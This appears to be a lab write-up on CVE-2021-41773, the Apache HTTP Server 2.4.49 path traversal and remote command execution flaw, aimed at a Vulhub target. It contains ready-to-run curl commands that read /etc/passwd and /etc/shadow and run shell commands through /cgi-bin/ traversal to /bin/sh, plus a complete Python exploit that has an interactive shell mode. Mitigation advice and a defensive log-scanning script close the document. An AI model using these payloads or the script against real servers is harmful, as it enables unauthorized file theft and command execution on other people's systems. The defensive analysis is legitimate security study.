## Vulnerability information

| Item | Content |
|---|---|
| CVE ID | CVE-2021-41773 |
| Vulnerability type | Path traversal → arbitrary file read / remote command execution (RCE) |
| Affected component | Apache HTTP Server |
| Affected version | 2.4.49 only; 2.4.48 and earlier are not affected by this version-specific path traversal; fixed in 2.4.50 |
| Lab version | Apache HTTP Server 2.4.49 (Unix), mod_cgi / mod_cgid enabled |
| Target | http://192.168.229.60:8080/ |
| Vulhub path | /vulhub/vulhub/httpd/CVE-2021-41773/ |
| Exploitation condition | The configuration must contain `<Directory />` ... `Require all granted` ... `</Directory>` (already configured in this lab) |

## Vulnerability principle

### Background

Apache HTTP Server 2.4.49 has a flaw in its URL path normalization logic. When the URL path contains `.%2e` (the URL-encoded form of `..`), Apache's path-parsing function fails to normalize it correctly, so directory restrictions can be bypassed to access files outside the web root.

### Root cause

Normal request:

```http
GET /icons/README HTTP/1.1
```

→ Apache normalizes the path → `/usr/local/apache2/htdocs/icons/README` ✅

Traversal request:

```http
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
```

→ Apache fails to decode and normalize `.%2e` (i.e. `..`) → the file actually served is `/etc/passwd` ❌

Path analysis:

```text
┌──────────────────────────────────────────────────┐
│ /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd      │
│         │    │      │      │                     │
│         ▼    ▼      ▼      ▼                     │
│        ../  ../    ../    ../                    │
│                                                  │
│  the first ../ climbs out of /icons/ once;       │
│  four consecutive traversals in total            │
│                                                  │
│  Path: /icons → / → / → / → / → /etc/passwd      │
└──────────────────────────────────────────────────┘
```

### RCE principle

When Apache also has `mod_cgi` or `mod_cgid` enabled, the path traversal can reach executables outside the `/cgi-bin/` directory. Traversing to `/bin/sh` and supplying POST data yields arbitrary command execution:

```http
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
Content-Type: application/x-www-form-urlencoded

echo;id
```

- `/cgi-bin/` is the CGI script directory in Apache's default configuration
- the traversal lands on `/bin/sh`, the system shell
- the leading `echo;` emits an empty line first so the command output is not mangled in the response
- the command that follows runs with the privileges of the `daemon` user

## Attack steps

### Step 1: Confirm the target version

```http
GET / HTTP/1.1
Host: 192.168.229.60:8080
```

```http
HTTP/1.1 200 OK
Server: Apache/2.4.49 (Unix)
Content-Type: text/html

<html><body><h1>It works!</h1></body></html>
```

The Apache version is confirmed as 2.4.49, which is vulnerable.

### Step 2: Path traversal to read arbitrary files

Use `.%2e` to bypass the path check and read arbitrary files on the server:

```bash
# Read /etc/passwd
curl -v --path-as-is http://192.168.229.60:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
```

```text
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
```

Key parameters:

- `--path-as-is` — tells curl **not** to normalize the path in the URL automatically; this flag is required
- `/icons/` — a directory that is accessible in Apache's default configuration
- `.%2e` — a literal dot followed by the URL-encoded dot `%2e`; after decoding the pair becomes `..` (parent directory)

More file-read examples:

```bash
# Read the Apache configuration file
curl --path-as-is http://192.168.229.60:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/usr/local/apache2/conf/httpd.conf

# Read script source under the web root (source that is normally protected from direct access)
curl --path-as-is http://192.168.229.60:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/usr/local/apache2/htdocs/index.html

# Read sensitive system files
curl --path-as-is http://192.168.229.60:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
curl --path-as-is http://192.168.229.60:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
```

### Step 3: Remote command execution via CGI

When the server has `mod_cgi` or `mod_cgid` enabled (it is enabled in this lab), the path traversal reaches the system shell:

```bash
curl -v --data "echo;id" http://192.168.229.60:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
```

```http
HTTP/1.1 200 OK
Server: Apache/2.4.49 (Unix)

uid=1(daemon) gid=1(daemon) groups=1(daemon)
```

The command runs as the `daemon` user. Changing the POST body runs any other command:

```bash
curl --data "echo;ls -la /" http://192.168.229.60:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
curl --data "echo;cat /etc/passwd" http://192.168.229.60:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
curl --data "echo;whoami" http://192.168.229.60:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
```

### Complete Python exploit script

```python
#!/usr/bin/env python3
"""
CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal / RCE Exploit
Author: Vulhub Lab
"""

import sys

import requests


class CVE_2021_41773:
    def __init__(self, target, port=80):
        self.base_url = f"http://{target}:{port}"
        self.session = requests.Session()

    def read_file(self, filepath, directory="/icons"):
        """
        Read an arbitrary file through the path traversal.

        Args:
            filepath: target file path, e.g. /etc/passwd
            directory: starting directory, default /icons
        Returns:
            file contents as a string, or None on failure
        """
        # Build the traversal: climb from /icons to the root, then descend to the target
        traversal = "/.%2e/%2e%2e/%2e%2e/%2e%2e"
        url = f"{self.base_url}{directory}{traversal}{filepath}"
        print(f"[*] Reading: {filepath}")
        print(f"[*] URL: {url}")
        try:
            # Counterpart of curl --path-as-is: the encoded segments are sent as-is
            r = self.session.get(url, timeout=10)
            if r.status_code == 200 and len(r.text) > 0:
                print(f"[+] Success! ({len(r.text)} bytes)")
                return r.text
            print(f"[-] Failed: HTTP {r.status_code}")
            return None
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")
            return None

    def exec_command(self, command):
        """
        Execute a system command through the CGI path traversal (RCE).

        Args:
            command: command to run, e.g. id or ls -la /
        Returns:
            command output as a string, or None on failure
        """
        url = f"{self.base_url}/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
        payload = f"echo;{command}"
        print(f"[*] Executing: {command}")
        print(f"[*] POST to: {url}")
        try:
            r = self.session.post(url, data=payload, timeout=10)
            if r.status_code == 200 and len(r.text) > 0:
                print(f"[+] Success! ({len(r.text)} bytes)")
                return r.text
            print(f"[-] Failed: HTTP {r.status_code}")
            return None
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")
            return None

    def interactive_shell(self):
        """Interactive command execution."""
        print("[*] CVE-2021-41773 RCE Interactive Shell (type 'exit' to quit)")
        print("[*] Commands run as daemon user")
        print()
        while True:
            try:
                cmd = input("$ ").strip()
                if cmd.lower() in ("exit", "quit"):
                    break
                if not cmd:
                    continue
                output = self.exec_command(cmd)
                if output:
                    print(output)
            except KeyboardInterrupt:
                print("\n[*] Exiting...")
                break
            except Exception as e:
                print(f"[-] Error: {e}")


def banner():
    print("=" * 55)
    print("  CVE-2021-41773 - Apache 2.4.49 Path Traversal / RCE")
    print("=" * 55)
    print()


def main():
    banner()
    if len(sys.argv) < 4:
        print("Usage:")
        print("  python3 cve-2021-41773.py <target> <port> read <filepath>")
        print("  python3 cve-2021-41773.py <target> <port> exec <command>")
        print("  python3 cve-2021-41773.py <target> <port> shell")
        print()
        print("Examples:")
        print("  python3 cve-2021-41773.py 192.168.229.60 8080 read /etc/passwd")
        print("  python3 cve-2021-41773.py 192.168.229.60 8080 exec id")
        print("  python3 cve-2021-41773.py 192.168.229.60 8080 shell")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2])
    action = sys.argv[3]
    exploit = CVE_2021_41773(target, port)

    if action == "read" and len(sys.argv) >= 5:
        filepath = sys.argv[4]
        content = exploit.read_file(filepath)
        if content:
            print("=" * 55)
            print(content.rstrip())
            print("=" * 55)
    elif action == "exec" and len(sys.argv) >= 5:
        command = " ".join(sys.argv[4:])
        output = exploit.exec_command(command)
        if output:
            print("=" * 55)
            print(output.rstrip())
            print("=" * 55)
    elif action == "shell":
        exploit.interactive_shell()
    else:
        print("[-] Invalid action or missing arguments")


if __name__ == "__main__":
    main()
```

Usage examples:

```bash
# Read a file
python3 cve-2021-41773.py 192.168.229.60 8080 read /etc/passwd

# Execute a command
python3 cve-2021-41773.py 192.168.229.60 8080 exec id

# Interactive shell
python3 cve-2021-41773.py 192.168.229.60 8080 shell
```

## Key takeaways

| ✅/⚠️ | Point |
|---|---|
| ✅ | CVE-2021-41773 affects only Apache HTTP Server **2.4.49**, a very rare single-version vulnerability |
| ✅ | Path traversal: `.%2e` (URL-encoded `..`) bypasses path normalization → arbitrary file read |
| ✅ | Remote command execution: when `mod_cgi`/`mod_cgid` is enabled, commands can be run via `/cgi-bin/.%2e/../bin/sh` |
| ✅ | `--path-as-is` is the key curl flag; without it curl normalizes the path and the attack fails |
| ✅ | The RCE runs as the `daemon` user, not root, but that is already enough to cause serious damage |
| ⚠️ | Fix: upgrade to Apache **2.4.50** or later |
| ⚠️ | Temporary mitigation: remove `<Directory />` ... `Require all granted` ... `</Directory>` from the configuration |
| ⚠️ | If the service cannot be upgraded, block request paths containing `%2e` or `..` at the WAF / Nginx reverse-proxy layer |
| ⚠️ | Large-scale in-the-wild exploitation appeared within 48 hours of the public disclosure in October 2021; this is an emergency-patch class vulnerability |
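The takeaways above recommend blocking request paths containing `%2e` or `..` at a proxy layer, and the root-cause section says Apache 2.4.49 failed to decode and normalize `.%2e` correctly. The block below is an added example, not code from the Vulhub page or from the Apache project. It shows the defender-side check done in the right order: percent-decode the path first (repeatedly, so double encoding does not slip through), then resolve dot segments, then refuse anything that climbs above the root. It also flags traversal that only becomes visible after decoding, which is exactly the signature of this bug, and runs the check over Apache combined-format access-log lines. The log lines, client IPs and timestamps are constructed for this example, and all function names (`decode_fully`, `resolve_segments`, `analyze_path`, `scan_access_log`) are my own.

```python
"""Defender-side check for CVE-2021-41773-style encoded path traversal.

Added example (not from the Vulhub page or the Apache project). It decodes the
request path *before* resolving dot segments, refuses anything that climbs above
the root, and reports traversal that only appears after decoding. Sample log
lines, client IPs and timestamps below are constructed for this example.
"""
import re
from urllib.parse import unquote

# Apache "combined" access-log format; only the client IP, request line and
# status code are used here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed log lines: two benign requests, the two payload shapes from the
# write-up, then a double-encoded variant that a single-pass decoder would miss.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2021:10:00:01 +0000] "GET /icons/README HTTP/1.1" 200 512
10.0.0.5 - - [05/Oct/2021:10:00:02 +0000] "GET /icons/../index.html HTTP/1.1" 200 45
10.0.0.9 - - [05/Oct/2021:10:00:03 +0000] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1290
10.0.0.9 - - [05/Oct/2021:10:00:04 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 52
10.0.0.9 - - [05/Oct/2021:10:00:05 +0000] "GET /icons/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 403 199
"""


def decode_fully(path, max_rounds=3):
    """Percent-decode until the value stops changing, so %252e -> %2e -> '.' is caught."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def resolve_segments(decoded_path):
    """Collapse '.' and '..' segments the way a correct normalizer must: on the
    already-decoded path. Returns (normalized_path, escaped_root)."""
    stack = []
    escaped = False
    for seg in decoded_path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True  # nothing left to pop: the path tries to leave the root
            continue
        stack.append(seg)
    return "/" + "/".join(stack), escaped


def analyze_path(raw_path):
    """Return a verdict dict for one request path (query string ignored)."""
    path_only = raw_path.split("?", 1)[0]
    decoded = decode_fully(path_only)
    normalized, escaped = resolve_segments(decoded)
    raw_segments = path_only.split("/")
    decoded_segments = decoded.split("/")
    has_dots = ".." in decoded_segments
    return {
        "raw": path_only,
        "decoded": decoded,
        "normalized": normalized,
        "has_dot_segments": has_dots,
        # '..' present only after decoding: dot segments were hidden by %2e encoding
        "encoded_traversal": has_dots and ".." not in raw_segments,
        "escapes_root": escaped,
    }


def scan_access_log(lines):
    """Return one record per request whose decoded path climbs above the root."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        verdict = analyze_path(m.group("path"))
        if verdict["escapes_root"]:
            hits.append({"ip": m.group("ip"), "method": m.group("method"),
                         "status": m.group("status"), **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        tag = "ENCODED " if hit["encoded_traversal"] else ""
        print(f"{hit['ip']} {hit['method']} {hit['raw']} -> {hit['normalized']} "
              f"[{tag}TRAVERSAL, HTTP {hit['status']}]")
```

Note that `/icons/../index.html` is reported as having dot segments but not as escaping the root: it resolves to `/index.html`, which is still inside the document root. A rule that blocks every `..` or `%2e`, as the takeaways suggest, is a reasonable emergency measure, but the `escapes_root` verdict is the precise condition a normalizer or proxy should enforce, and the `encoded_traversal` flag isolates the requests that exploit this specific decoding flaw.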